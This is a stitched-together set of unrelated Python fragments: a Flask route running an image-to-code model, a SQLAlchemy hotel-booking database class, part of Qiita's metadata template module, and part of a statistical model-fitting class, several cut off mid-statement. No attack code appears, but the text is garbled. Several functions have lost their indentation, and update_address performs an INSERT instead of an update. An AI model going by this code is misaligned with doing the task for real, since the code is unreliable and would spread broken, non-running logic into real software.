            probas = probas_sequence[k]
            out_probas.append(probas)
            predictions += self.voc.token_lookup[prediction]
        return predictions, out_probas
@app.route("/Produce")
def produce():
    """Render the code-generation page (GET /Produce)."""
    return render_template('produce.html')
@app.route("/ProduceProcess", methods=["POST"])
def produce_process():
print("produce_process Called")
trained_weights_path = "static/model"
trained_model_name = "imagetocode2"
input_path = "static/datasets/web/eval"
output_path = "static/guicode"
search_method = "greedy"
meta_dataset = np.load("{}/meta_dataset.npy".format(trained_weights_path), allow_pickle=True)
input_shape = meta_dataset[0]
output_size = meta_dataset[1]
model = image_to_code(input_shape, output_size, trained_weights_path)
model.load(trained_model_name)
sampler = Sampler(trained_weights_path, input_shape, output_size, CONTEXT_LENGTH)
for f in os.listdir(input_path):
if f.find(".png") != -1:
evaluation_img = Utils.get_preprocessed_img("{}/{}".format(input_path, f), IMAGE_SIZE)
file_name = f[:f.find(".png")]
if search_method == "greedy":
result, _ = sampler.predict_greedy(model, np.array([evaluation_img]))
print("Result greedy: {}".format(result))
else:
beam_width = int(search_method)
print("Search with beam width: {}".format(beam_width))
result, _ = sampler.predict_beam_search(model, | |
import sqlalchemy
from sqlalchemy import BigInteger
from sqlalchemy import Boolean
from sqlalchemy import Column
from sqlalchemy import create_engine
from sqlalchemy import Date
from sqlalchemy import DateTime
from sqlalchemy import delete
from sqlalchemy import Float
from sqlalchemy import ForeignKey
from sqlalchemy import insert
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import text
from sqlalchemy import TIMESTAMP
from sqlalchemy import update
from sqlalchemy.sql import select
class Database:
"""Database class is used to handle requests to our database.
You can call it and specify some parameters ::
>>> from database import Database
    >>> db = Database(user="matteyeux", password="pass",
                      host="localhost", database="mydb")
>>> db.db_string
'mysql+pymysql://matteyeux:pass@localhost/mydb'
>>>
"""
    def __init__(
        self,
        connector: str = "mysql+pymysql",
        user: str = None,
        password: str = None,
        host: str = None,
        database: str = None,
    ):
        """Build the DB URL and open a connection.

        NOTE(review): despite its name, ``self.engine`` holds
        ``create_engine(...).connect()`` — i.e. a Connection, not an
        Engine. On connection failure it is silently set to None, so every
        later method will raise AttributeError; confirm callers expect
        this.
        """
        self.db_string = f"{connector}://{user}:{password}@{host}/{database}"
        try:
            self.engine = create_engine(self.db_string).connect()
        except sqlalchemy.exc.OperationalError:
            self.engine = None
    def setup_rooms_table(self) -> sqlalchemy.sql.schema.Table:
        """Return the SQLAlchemy Table metadata for ``rooms``.

        NOTE(review): unlike the other tables, the timestamp columns here
        are not declared ``nullable=False`` — confirm against the actual
        schema.
        """
        meta = MetaData(self.engine)
        rooms_table = Table(
            "rooms",
            meta,
            Column("id", Integer, primary_key=True),
            Column("hotel_id", Integer, ForeignKey("hotels.id")),
            Column("room", String(50)),
            Column("capacity", Integer),
            Column("price", Float),
            Column(
                "created_time",
                TIMESTAMP,
                server_default=text("CURRENT_TIMESTAMP"),
            ),
            Column(
                "updated_time",
                TIMESTAMP,
                server_default=text(
                    "CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP",
                ),
            ),
        )
        return rooms_table
    def setup_booking_table(self) -> sqlalchemy.sql.schema.Table:
        """Return the SQLAlchemy Table metadata for ``booking``."""
        meta = MetaData(self.engine)
        booking_table = Table(
            "booking",
            meta,
            Column("id", BigInteger, primary_key=True),
            Column("room_id", Integer, ForeignKey("rooms.id")),
            Column("customer_id", BigInteger, ForeignKey("customers.id")),
            Column("capacity_book", Integer),
            Column("order_price", Float),
            Column("booking_start_date", Date),
            Column("booking_end_date", Date),
            Column(
                "created_time",
                TIMESTAMP,
                nullable=False,
                server_default=text("CURRENT_TIMESTAMP"),
            ),
            Column(
                "updated_time",
                TIMESTAMP,
                nullable=False,
                server_default=text(
                    "CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP",
                ),
            ),
        )
        return booking_table
    def setup_hotels_table(self) -> sqlalchemy.sql.schema.Table:
        """Return the SQLAlchemy Table metadata for ``hotels``."""
        meta = MetaData(self.engine)
        hotels_table = Table(
            "hotels",
            meta,
            Column("id", Integer, primary_key=True),
            Column("name", String(40)),
            Column("telephone", String(20)),
            Column("website", String(100)),
            Column("description", String(100)),
            Column("owner", String(50)),
            Column(
                "created_time",
                TIMESTAMP,
                nullable=False,
                server_default=text("CURRENT_TIMESTAMP"),
            ),
            Column(
                "updated_time",
                TIMESTAMP,
                nullable=False,
                server_default=text(
                    "CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP",
                ),
            ),
        )
        return hotels_table
    def setup_addresses_table(self) -> sqlalchemy.sql.schema.Table:
        """Return the SQLAlchemy Table metadata for ``addresses``."""
        meta = MetaData(self.engine)
        addresses_table = Table(
            "addresses",
            meta,
            Column("id", Integer, primary_key=True),
            Column("hotel_id", Integer, ForeignKey("hotels.id")),
            Column("number", String(50)),
            Column("street", String(50)),
            Column("town", String(50)),
            Column("postal_code", Integer),
            Column(
                "created_time",
                TIMESTAMP,
                nullable=False,
                server_default=text("CURRENT_TIMESTAMP"),
            ),
            Column(
                "updated_time",
                TIMESTAMP,
                nullable=False,
                server_default=text(
                    "CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP",
                ),
            ),
        )
        return addresses_table
    def setup_price_policies_table(self) -> sqlalchemy.sql.schema.Table:
        """Return the SQLAlchemy Table metadata for ``price_policies``."""
        meta = MetaData(self.engine)
        price_policies = Table(
            "price_policies",
            meta,
            Column("id", Integer, primary_key=True),
            Column("room_id", Integer, ForeignKey("rooms.id")),
            Column("name", String(100)),
            Column("price_policy_type", Integer),
            Column("room_majoration", Float),
            Column("day_number", Integer),
            Column("capacity_limit", Integer),
            Column("majoration_start_date", DateTime),
            Column("majoration_end_date", DateTime),
            Column("is_default", Boolean, nullable=False),
            Column(
                "created_time",
                TIMESTAMP,
                nullable=False,
                server_default=text("CURRENT_TIMESTAMP"),
            ),
            Column(
                "updated_time",
                TIMESTAMP,
                nullable=False,
                server_default=text(
                    "CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP",
                ),
            ),
        )
        return price_policies
    def setup_options_table(self) -> sqlalchemy.sql.schema.Table:
        """Return the SQLAlchemy Table metadata for ``options``."""
        meta = MetaData(self.engine)
        options = Table(
            "options",
            meta,
            Column("id", Integer, primary_key=True),
            Column("name", String(100)),
            Column("price", Float),
        )
        return options
    def get_hotels(self) -> sqlalchemy.engine.cursor.LegacyCursorResult:
        """Return all hotels joined with their address rows.

        Returns a list of Row objects carrying the hotel columns plus the
        address' number/street/postal_code/town.
        """
        addresses_table = self.setup_addresses_table()
        hotels_table = self.setup_hotels_table()
        join = hotels_table.join(
            addresses_table,
            hotels_table.c.id == addresses_table.c.hotel_id,
        )
        query = select(
            hotels_table.c.id,
            hotels_table.c.name,
            hotels_table.c.telephone,
            hotels_table.c.website,
            hotels_table.c.description,
            hotels_table.c.owner,
            addresses_table.c.number,
            addresses_table.c.street,
            addresses_table.c.postal_code,
            addresses_table.c.town,
        ).select_from(join)
        return self.engine.connect().execute(query).all()
    def get_hotel_by_id(
        self,
        hotel_id: int = 1,
    ) -> sqlalchemy.engine.cursor.LegacyCursorResult:
        """Return a single hotel (joined with its address) or None.

        Args:
            hotel_id: primary key of the hotel to fetch.
        """
        addresses_table = self.setup_addresses_table()
        hotels_table = self.setup_hotels_table()
        join = hotels_table.join(
            addresses_table,
            hotels_table.c.id == addresses_table.c.hotel_id,
        )
        query = (
            select(
                hotels_table.c.id,
                hotels_table.c.name,
                hotels_table.c.telephone,
                hotels_table.c.website,
                hotels_table.c.description,
                hotels_table.c.owner,
                addresses_table.c.number,
                addresses_table.c.street,
                addresses_table.c.postal_code,
                addresses_table.c.town,
            )
            .where(hotels_table.c.id == hotel_id)
            .select_from(join)
        )
        # fetchone() returns a single Row (or None), not a list.
        return self.engine.connect().execute(query).fetchone()
    def create_hotel(
        self,
        hotel,
    ) -> sqlalchemy.engine.cursor.LegacyCursorResult:
        """Insert a hotel row and return it as a dict with its new id.

        Args:
            hotel: pydantic-style model with name/telephone/website/
                description/owner attributes and a .dict() method.

        NOTE(review): relies on LAST_INSERT_ID() observing the prior
        INSERT; confirm both statements run on the same DB session.
        """
        hotel_table = self.setup_hotels_table()
        query_hotel = insert(hotel_table).values(
            name=hotel.name,
            telephone=hotel.telephone,
            website=hotel.website,
            description=hotel.description,
            owner=hotel.owner,
        )
        self.engine.connect().execute(query_hotel)
        last_hotel_id = (
            self.engine.connect()
            .execute(
                "SELECT LAST_INSERT_ID() as id",
            )
            .fetchone()
        )
        return {"id": last_hotel_id.id, **hotel.dict()}
    def update_hotel(self, hotel, hotel_id):
        """Update the hotel row matching hotel_id; return it as a dict."""
        hotel_table = self.setup_hotels_table()
        query = (
            update(hotel_table)
            .values(
                name=hotel.name,
                telephone=hotel.telephone,
                website=hotel.website,
                description=hotel.description,
                owner=hotel.owner,
            )
            .where(hotel_table.c.id == hotel_id)
        )
        self.engine.connect().execute(query)
        return {"id": hotel_id, **hotel.dict()}
    def delete_hotel(self, hotel_id):
        """Delete the hotel row matching hotel_id; return the result proxy."""
        hotel_table = self.setup_hotels_table()
        # TODO : Check if the cascade deletion is up or not ?
        query = delete(hotel_table).where(hotel_table.c.id == hotel_id)
        return self.engine.connect().execute(query)
    def get_all_addresses(self):
        """Return every address row as a list of Row objects."""
        address_tables = self.setup_addresses_table()
        query = select(
            address_tables.c.id,
            address_tables.c.hotel_id,
            address_tables.c.number,
            address_tables.c.street,
            address_tables.c.postal_code,
            address_tables.c.town,
        )
        return self.engine.connect().execute(query).all()
    def get_address_by_hotel_id(self, hotel_id):
        """Return all address rows attached to the given hotel id."""
        address_table = self.setup_addresses_table()
        query = select(
            address_table.c.id,
            address_table.c.hotel_id,
            address_table.c.number,
            address_table.c.street,
            address_table.c.town,
            address_table.c.postal_code,
        ).where(address_table.c.hotel_id == hotel_id)
        result = self.engine.connect().execute(query).all()
        return result
    def get_address_by_id(self, address_id):
        """Return the address row matching address_id, or None."""
        address_table = self.setup_addresses_table()
        query = select(
            address_table.c.id,
            address_table.c.hotel_id,
            address_table.c.number,
            address_table.c.street,
            address_table.c.town,
            address_table.c.postal_code,
        ).where(address_table.c.id == address_id)
        result = self.engine.connect().execute(query).fetchone()
        return result
    def create_address(self, address, hotel_id):
        """Insert an address for a hotel; return it as a dict with its id.

        NOTE(review): relies on LAST_INSERT_ID() observing the prior
        INSERT; confirm both statements share one DB session.
        """
        address_table = self.setup_addresses_table()
        query = insert(address_table).values(
            hotel_id=hotel_id,
            number=address.number,
            street=address.street,
            town=address.town,
            postal_code=address.postal_code,
        )
        self.engine.connect().execute(query)
        last_address_id = (
            self.engine.connect()
            .execute(
                "SELECT LAST_INSERT_ID() as id",
            )
            .fetchone()
        )
        return {"id": last_address_id.id, **address.dict()}
def update_address(self, address, address_id):
""" Update an address by its id. """
address_table = self.setup_addresses_table()
query = insert(address_table).values(
hotel_id=address.hotel_id,
number=address.number,
street=address.street,
town=address.town,
postal_code=address.postal_code,
)
self.engine.connect().execute(query)
return {"id": address_id, **address.dict()}
    def delete_address(self, address_id):
        """Delete the address row matching address_id; return the result."""
        address_table = self.setup_addresses_table()
        query = delete(address_table).where(address_table.c.id == address_id)
        return self.engine.connect().execute(query)
    def get_all_rooms(
        self,
        hotel_id: int = 0,
        capacity: int = 0,
    ) -> sqlalchemy.engine.cursor.LegacyCursorResult:
        """List rooms, optionally filtered by hotel and/or exact capacity.

        Args:
            hotel_id: if > 0, restrict to rooms of this hotel.
            capacity: if > 0, restrict to rooms with exactly this capacity.
        """
        rooms_table = self.setup_rooms_table()
        query = select(
            rooms_table.c.id,
            rooms_table.c.hotel_id,
            rooms_table.c.room,
            rooms_table.c.price,
            rooms_table.c.capacity,
        )
        # Filters are additive: both may apply at once.
        if hotel_id > 0:
            query = query.where(rooms_table.c.hotel_id == hotel_id)
        if capacity > 0:
            query = query.where(rooms_table.c.capacity == capacity)
        rooms_result = self.engine.connect().execute(query).all()
        return rooms_result
    def get_room_by_id(
        self,
        room_id: int = 1,
    ) -> sqlalchemy.engine.cursor.LegacyCursorResult:
        """Return the room row matching room_id, or None."""
        table = self.setup_rooms_table()
        query = select(
            table.c.id,
            table.c.hotel_id,
            table.c.room,
            table.c.price,
            table.c.capacity,
        ).where(table.c.id == room_id)
        return self.engine.connect().execute(query).fetchone()
    def create_room(self, room):
        """Insert a room row; return it as a dict with its new id.

        NOTE(review): relies on LAST_INSERT_ID() observing the prior
        INSERT; confirm both statements share one DB session.
        """
        room_table = self.setup_rooms_table()
        query = insert(room_table).values(
            hotel_id=room.hotel_id,
            room=room.room,
            capacity=room.capacity,
            price=room.price,
        )
        self.engine.connect().execute(query)
        last_row = (
            self.engine.connect()
            .execute(
                "SELECT LAST_INSERT_ID() as id",
            )
            .fetchone()
        )
        return {"id": last_row.id, **room.dict()}
    def update_room(self, room, room_id):
        """Update the room row matching room_id; return it as a dict."""
        room_table = self.setup_rooms_table()
        query = (
            update(room_table)
            .where(room_table.c.id == room_id)
            .values(
                hotel_id=room.hotel_id,
                room=room.room,
                capacity=room.capacity,
                price=room.price,
            )
        )
        self.engine.connect().execute(query)
        return {"id": room_id, **room.dict()}
    def delete_room(self, room_id):
        """Delete the room row matching room_id; return the result proxy."""
        room_table = self.setup_rooms_table()
        query = delete(room_table).where(room_table.c.id == room_id)
        return self.engine.connect().execute(query)
    def get_options(self) -> sqlalchemy.engine.cursor.LegacyCursorResult:
        """Return every option row as a list of Row objects."""
        option_table = self.setup_options_table()
        query = select(
            option_table.c.id,
            option_table.c.name,
            option_table.c.price,
        )
        options_result = self.engine.connect().execute(query).all()
        return options_result
    def get_option_by_id(self, option_id: int = 1):
        """Return the option(s) matching option_id as a list of Rows."""
        option_table = self.setup_options_table()
        query = option_table.select().where(option_table.c.id == option_id)
        return self.engine.connect().execute(query).all()
    def create_option(self, option):
        """Insert an option row; return it as a dict with its new id.

        NOTE(review): relies on LAST_INSERT_ID() observing the prior
        INSERT; confirm both statements share one DB session.
        """
        option_table = self.setup_options_table()
        query = insert(option_table).values(
            name=option.name,
            price=option.price,
        )
        self.engine.connect().execute(query)
        last_row = (
            self.engine.connect()
            .execute(
                "SELECT LAST_INSERT_ID() as id",
            )
            .fetchone()
        )
        return {"id": last_row.id, **option.dict()}
    def update_option(self, option, option_id):
        """Update the option row matching option_id; return it as a dict."""
        option_table = self.setup_options_table()
        query = (
            update(option_table)
            .where(option_table.c.id == option_id)
            .values(
                name=option.name,
                price=option.price,
            )
        )
        self.engine.connect().execute(query)
        return {"id": option_id, **option.dict()}
    def delete_option(self, option_id):
        """Delete the option row matching option_id; return the result."""
        option_table = self.setup_options_table()
        query = delete(option_table).where(option_table.c.id == option_id)
        return self.engine.connect().execute(query)
    def get_price_policies(self):
        """Return every price-policy row as a list of Row objects."""
        pp_table = self.setup_price_policies_table()
        query = select(
            pp_table.c.id,
            pp_table.c.name,
            pp_table.c.room_id,
            pp_table.c.room_majoration,
            pp_table.c.price_policy_type,
            pp_table.c.day_number,
            pp_table.c.capacity_limit,
            pp_table.c.is_default,
            pp_table.c.majoration_start_date,
            pp_table.c.majoration_end_date,
        )
        pp_result = self.engine.connect().execute(query).all()
        return pp_result
    def get_price_policy_by_id(self, price_policy_id):
        """Return the price-policy row(s) matching the id as a list."""
        pp_table = self.setup_price_policies_table()
        query = select(
            pp_table.c.id,
            pp_table.c.name,
            pp_table.c.room_id,
            pp_table.c.room_majoration,
            pp_table.c.price_policy_type,
            pp_table.c.day_number,
            pp_table.c.capacity_limit,
            pp_table.c.is_default,
            pp_table.c.majoration_start_date,
            pp_table.c.majoration_end_date,
        ).where(pp_table.c.id == price_policy_id)
        pp_result = self.engine.connect().execute(query).all()
        return pp_result
    def create_price_policy(self, price_policy):
        """Insert a price-policy row; return it as a dict with its new id.

        NOTE(review): relies on LAST_INSERT_ID() observing the prior
        INSERT; confirm both statements share one DB session.
        """
        pp_table = self.setup_price_policies_table()
        # TODO : Add check
        # manage_rules_price_policies
        query = insert(pp_table).values(
            name=price_policy.name,
            room_id=price_policy.room_id,
            room_majoration=price_policy.room_majoration,
            price_policy_type=price_policy.price_policy_type,
            day_number=price_policy.day_number,
            capacity_limit=price_policy.capacity_limit,
            is_default=price_policy.is_default,
            majoration_start_date=price_policy.majoration_start_date,
            majoration_end_date=price_policy.majoration_end_date,
        )
        self.engine.connect().execute(query)
        last_row = (
            self.engine.connect()
            .execute(
                "SELECT LAST_INSERT_ID() as id",
            )
            .fetchone()
        )
        return {"id": last_row.id, **price_policy.dict()}
    def update_price_policy(self, price_policy, price_policy_id):
        """Update the price-policy row matching the id; return it as a dict."""
        pp_table = self.setup_price_policies_table()
        # TODO : Add check
        # manage_rules_price_policies
        query = (
            update(pp_table)
            .where(pp_table.c.id == price_policy_id)
            .values(
                name=price_policy.name,
                room_id=price_policy.room_id,
                price_policy_type=price_policy.price_policy_type,
                room_majoration=price_policy.room_majoration,
                day_number=price_policy.day_number,
                capacity_limit=price_policy.capacity_limit,
                is_default=price_policy.is_default,
                majoration_start_date=price_policy.majoration_start_date,
                majoration_end_date=price_policy.majoration_end_date,
            )
        )
        self.engine.connect().execute(query)
        return {"id": price_policy_id, **price_policy.dict()}
def delete_price_policy(self, price_policy_id):
""" Delete an option. """
pp_table = self.setup_price_policies_table()
query = delete(pp_table).where(pp_table.c.id == price_policy_id)
| |
<filename>qiita_db/metadata_template/base_metadata_template.py
r"""
Metadata template objects (:mod:`qiita_db.metadata_template`)
=============================================================
..currentmodule:: qiita_db.metadata_template
This module provides the MetadataTemplate base class and the subclasses
SampleTemplate and PrepTemplate.
Classes
-------
..autosummary::
:toctree: generated/
BaseSample
Sample
PrepSample
MetadataTemplate
SampleTemplate
PrepTemplate
Methods
-------
..autosummary::
:toctree: generated/
"""
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from __future__ import division
from future.utils import viewitems, viewvalues
from future.builtins import zip
from os.path import join
from functools import partial
import pandas as pd
import numpy as np
from skbio.util import find_duplicates
import warnings
from qiita_core.exceptions import IncompetentQiitaDeveloperError
from qiita_db.exceptions import (QiitaDBUnknownIDError, QiitaDBColumnError,
QiitaDBNotImplementedError, QiitaDBError,
QiitaDBWarning, QiitaDBDuplicateHeaderError,
QiitaDBDuplicateSamplesError)
from qiita_db.base import QiitaObject
from qiita_db.sql_connection import TRN
from qiita_db.util import (exists_table, get_table_cols,
get_mountpoint, insert_filepaths)
from qiita_db.logger import LogEntry
from .util import (as_python_types, get_datatypes, get_invalid_sample_names,
prefix_sample_names_with_id, type_lookup, cast_to_python)
class BaseSample(QiitaObject):
r"""Sample object that accesses the db to get the information of a sample
belonging to a PrepTemplate or a SampleTemplate.
Parameters
----------
sample_id : str
The sample id
md_template : MetadataTemplate
The metadata template obj to which the sample belongs to
Methods
-------
__eq__
__len__
__getitem__
__setitem__
__delitem__
__iter__
__contains__
exists
keys
values
items
get
See Also
--------
QiitaObject
Sample
PrepSample
"""
# Used to find the right SQL tables - should be defined on the subclasses
_table_prefix = None
_column_table = None
_id_column = None
    def _check_template_class(self, md_template):
        r"""Checks that md_template is of the correct type

        Subclasses must override this with an actual isinstance check;
        the base implementation always raises.

        Parameters
        ----------
        md_template : MetadataTemplate
            The metadata template

        Raises
        ------
        IncompetentQiitaDeveloperError
            If its call directly from the Base class
            If `md_template` doesn't have the correct type
        """
        raise IncompetentQiitaDeveloperError()
    def __init__(self, sample_id, md_template):
        r"""Initializes the object

        Parameters
        ----------
        sample_id : str
            The sample id
        md_template : MetadataTemplate
            The metadata template in which the sample is present

        Raises
        ------
        QiitaDBUnknownIDError
            If `sample_id` does not correspond to any sample in md_template
        """
        # Check that we are not instantiating the base class
        self._check_subclass()
        # Check that the md_template is of the correct type
        self._check_template_class(md_template)
        # Check if the sample id is present on the passed metadata template
        # This test will check that the sample id is actually present on the db
        if sample_id not in md_template:
            raise QiitaDBUnknownIDError(sample_id, self.__class__.__name__)
        # Assign private attributes
        self._id = sample_id
        self._md_template = md_template
        # Per-template dynamic table name, e.g. "<prefix><template_id>".
        self._dynamic_table = "%s%d" % (self._table_prefix,
                                        self._md_template.id)
    def __hash__(self):
        r"""Defines the hash function so samples are hashable

        Hashes only the sample id; consistent with __eq__, since equal
        samples necessarily share the same id (and thus the same hash).
        """
        return hash(self._id)
def __eq__(self, other):
r"""Self and other are equal based on type and ids"""
if not isinstance(other, type(self)):
return False
if other._id != self._id:
return False
if other._md_template != self._md_template:
return False
return True
@classmethod
def exists(cls, sample_id, md_template):
r"""Checks if already exists a MetadataTemplate for the provided object
Parameters
----------
sample_id : str
The sample id
md_template : MetadataTemplate
The metadata template to which the sample belongs to
Returns
-------
bool
True if already exists. False otherwise.
"""
with TRN:
cls._check_subclass()
sql = """SELECT EXISTS(
SELECT * FROM qiita.{0}
WHERE sample_id=%s AND {1}=%s
)""".format(cls._table, cls._id_column)
TRN.add(sql, [sample_id, md_template.id])
return TRN.execute_fetchlast()
def _get_categories(self):
r"""Returns all the available metadata categories for the sample
Returns
-------
set of str
The set of all available metadata categories
"""
# Get all the columns
cols = get_table_cols(self._dynamic_table)
# Remove the sample_id column as this column is used internally for
# data storage and it doesn't actually belong to the metadata
cols.remove('sample_id')
return set(cols)
def _to_dict(self):
r"""Returns the categories and their values in a dictionary
Returns
-------
dict of {str: str}
A dictionary of the form {category: value}
"""
with TRN:
sql = "SELECT * FROM qiita.{0} WHERE sample_id=%s".format(
self._dynamic_table)
TRN.add(sql, [self._id])
d = dict(TRN.execute_fetchindex()[0])
# Remove the sample_id, is not part of the metadata
del d['sample_id']
return d
def __len__(self):
r"""Returns the number of metadata categories
Returns
-------
int
The number of metadata categories
"""
# return the number of columns
return len(self._get_categories())
def __getitem__(self, key):
r"""Returns the value of the metadata category `key`
Parameters
----------
key : str
The metadata category
Returns
-------
obj
The value of the metadata category `key`
Raises
------
KeyError
If the metadata category `key` does not exists
See Also
--------
get
"""
with TRN:
key = key.lower()
if key not in self._get_categories():
# The key is not available for the sample, so raise a KeyError
raise KeyError(
"Metadata category %s does not exists for sample %s"
" in template %d" % (key, self._id, self._md_template.id))
sql = """SELECT {0} FROM qiita.{1}
WHERE sample_id=%s""".format(key, self._dynamic_table)
TRN.add(sql, [self._id])
return TRN.execute_fetchlast()
def setitem(self, column, value):
"""Sets `value` as value for the given `column`
Parameters
----------
column : str
The column to update
value : str
The value to set. This is expected to be a str on the assumption
that psycopg2 will cast as necessary when updating.
Raises
------
QiitaDBColumnError
If the column does not exist in the table
"""
with TRN:
# Check if the column exist in the table
if column not in self._get_categories():
raise QiitaDBColumnError("Column %s does not exist in %s" %
(column, self._dynamic_table))
sql = """UPDATE qiita.{0}
SET {1}=%s
WHERE sample_id=%s""".format(self._dynamic_table, column)
TRN.add(sql, [value, self._id])
def __setitem__(self, column, value):
r"""Sets the metadata value for the category `column`
Parameters
----------
column : str
The column to update
value : str
The value to set. This is expected to be a str on the assumption
that psycopg2 will cast as necessary when updating.
Raises
------
ValueError
If the value type does not match the one in the DB
"""
with TRN:
self.setitem(column, value)
try:
TRN.execute()
except ValueError as e:
# catching error so we can check if the error is due to
# different column type or something else
value_type = type_lookup(type(value))
sql = """SELECT udt_name
FROM information_schema.columns
WHERE column_name = %s
AND table_schema = 'qiita'
AND (table_name = %s OR table_name = %s)"""
TRN.add(sql, [column, self._table, self._dynamic_table])
column_type = TRN.execute_fetchlast()
if column_type != value_type:
raise ValueError(
'The new value being added to column: "{0}" is "{1}" '
'(type: "{2}"). However, this column in the DB is of '
'type "{3}". Please change the value in your updated '
'template or reprocess your template.'.format(
column, value, value_type, column_type))
raise e
def __delitem__(self, key):
r"""Removes the sample with sample id `key` from the database
Parameters
----------
key : str
The sample id
"""
raise QiitaDBNotImplementedError()
def __iter__(self):
r"""Iterator over the metadata keys
Returns
-------
Iterator
Iterator over the sample ids
See Also
--------
keys
"""
return iter(self._get_categories())
def __contains__(self, key):
r"""Checks if the metadata category `key` is present
Parameters
----------
key : str
The sample id
Returns
-------
bool
True if the metadata category `key` is present, false otherwise
"""
return key.lower() in self._get_categories()
def keys(self):
r"""Iterator over the metadata categories
Returns
-------
Iterator
Iterator over the sample ids
See Also
--------
__iter__
"""
return self.__iter__()
def values(self):
r"""Iterator over the metadata values, in metadata category order
Returns
-------
Iterator
Iterator over metadata values
"""
d = self._to_dict()
return d.values()
def items(self):
r"""Iterator over (category, value) tuples
Returns
-------
Iterator
Iterator over (category, value) tuples
"""
d = self._to_dict()
return d.items()
def get(self, key):
r"""Returns the metadata value for category `key`, or None if the
category `key` is not present
Parameters
----------
key : str
The metadata category
Returns
-------
Obj or None
The value object for the category `key`, or None if it is not
present
See Also
--------
__getitem__
"""
try:
return self[key]
except KeyError:
return None
class MetadataTemplate(QiitaObject):
r"""Metadata map object that accesses the db to get the sample/prep
template information
Attributes
----------
id
Methods
-------
exists
__len__
__getitem__
__setitem__
__delitem__
__iter__
__contains__
keys
values
items
get
to_file
add_filepath
update
See Also
--------
QiitaObject
SampleTemplate
PrepTemplate
"""
# Used to find the right SQL tables - should be defined on the subclasses
_table_prefix = None
_column_table = None
_id_column = None
_sample_cls = None
def _check_id(self, id_):
r"""Checks that the MetadataTemplate id_ exists on the database"""
with TRN:
sql = "SELECT EXISTS(SELECT * FROM qiita.{0} WHERE {1}=%s)".format(
self._table, | |
evaluate likelihood at initial parameters provided"
)
except Exception as e:
raise e
# maximize ln(L) (NOTE: this is set up to match the R version)
opt_options = {"maxiter": 100000}
if self.ignore_uncertainties:
# Coarse binning when x_err is None requires different solver that
# doesn't use jacobian.
method = "Nelder-Mead"
else:
method = "BFGS"
opt = minimize(neglogL, p0, method=method, options=opt_options)
offset += opt.fun
chain[k] = np.concatenate((opt.x, [opt.fun]))
# assess convergence
if (
self.ignore_uncertainties and not self.correct_lss_bias
) or self.keep_eddington_bias:
converged = opt.success
running = False
else:
value_old = 1.0 * opt.fun
# asses convergence
if k == 0:
converged = False
d_old = np.inf
else:
d = np.abs(opt.fun - value_old)
converged = d >= d_old
d_old = d * 1
if converged:
running = False
elif k == self.n_iterations - 1:
converged = False
running = False
print(
"WARNING: Maximum number of iteration reached. Consider increasing "
"n.iterations and/or providing better initial parameters."
)
# prepare initial values for next iteration
p0 = opt.x
k += 1
# make output
cov = self.covariance(opt.x)
if np.linalg.det(cov) > 1e12:
converged = False
cov = None
print(
"WARNING: Fit ill-conditioned. Consider providing better initial parameters or selection arguments."
)
ln_evidence = False
else:
n_para = len(opt.x)
ln_evidence = (
-offset
+ 0.5 * n_para * np.log(2 * np.pi)
+ 0.5 * np.log(np.linalg.det(cov))
)
if self.correct_lss_bias:
self.selection._get_veff_lss(
self.data.r,
self.grid,
opt.x,
self.model,
weight=self.lss_weight
if self.lss_weight is not None
else lambda x: np.ones_like(x),
)
fit = Fit(
p_best=opt.x,
p_covariance=cov,
lnL=lambda p: -neglogL(p),
opt=opt,
status=dict(n_iterations=k, converged=converged, chain=chain[:k]),
ln_evidence=ln_evidence,
gdf_=self.model.gdf,
veff_=self.selection.Veff,
)
# UPDATE GRID
self.grid.gdf = self.model.gdf(*self.grid.x, p=opt.x)
self.grid.veff = self.selection.Veff(*self.grid.x)
self.grid.scd = self.grid.gdf * self.grid.veff
# finalize output
return fit
@cached_property
def _gaussian_errors(self):
    """Evaluate the GDF for parameter vectors drawn on the 1-sigma
    covariance ellipsoid and record the per-gridpoint envelope.

    Returns
    -------
    tuple of ndarray
        ``(gdf_gaussian_min, gdf_gaussian_max)``, each of length
        ``grid.n_points``; also stored on ``self.grid``.
    """
    n_samples = 500
    # parameter vectors on the surface of the 1-sigma ellipsoid
    params = sample_ellipsoid(
        self.fit.p_covariance, n_samples, add_boundaries=True,
        mean=self.fit.p_best,
    )
    # one column of GDF values per sampled parameter vector
    samples = np.empty((self.grid.n_points, len(params)))
    for column, p in enumerate(params):
        samples[:, column] = self.model.gdf(*self.grid.x, p=p)
    self.grid.gdf_gaussian_min = np.nanmin(samples, axis=1)
    self.grid.gdf_gaussian_max = np.nanmax(samples, axis=1)
    return self.grid.gdf_gaussian_min, self.grid.gdf_gaussian_max
@cached_property
def gdf_gaussian_min(self):
    """Lower envelope of the generative distribution function at each
    gridded x, over all parameter combinations within 1-sigma of the
    best fit."""
    lower, _ = self._gaussian_errors
    return lower
@cached_property
def gdf_gaussian_max(self):
    """Upper envelope of the generative distribution function at each
    gridded x, over all parameter combinations within 1-sigma of the
    best fit."""
    _, upper = self._gaussian_errors
    return upper
def _refit_to_new_sample(self, n, do_jackknife=False, lss_errors=True):
    """Refit the model to ``n`` resampled realisations of the data.

    Parameters
    ----------
    n : int
        Number of resampling iterations; capped at the number of data
        points when jackknifing.
    do_jackknife : bool, optional
        If ``True``, leave exactly one (randomly chosen, without
        replacement) data point out per iteration instead of
        bootstrapping with replacement.
    lss_errors : bool, optional
        Whether the large-scale-structure correction is refitted at each
        iteration (only relevant when ``correct_lss_bias=True``).

    Returns
    -------
    ndarray of shape (n, n_param)
        Best-fit parameters of each resampled fit.
    """
    if not self.fit.status["converged"]:
        # NOTE(review): this only warns and then proceeds anyway —
        # confirm whether an early return is intended here.
        print(
            "The fit did not converge, and therefore resampling cannot be performed."
        )
    # input handling
    n_data = self.data.n_data
    npar = self.model.n_param
    if do_jackknife:
        n = min(n, n_data)
    if n_data < 3:
        raise ValueError("Resampling/Jackknifing requires at least three objects.")
    if n < 2:
        raise ValueError("Resampling/Jackknifing requires at least 2 iterations")
    # randomly resample and refit the DF
    p_new = np.empty((n, npar))
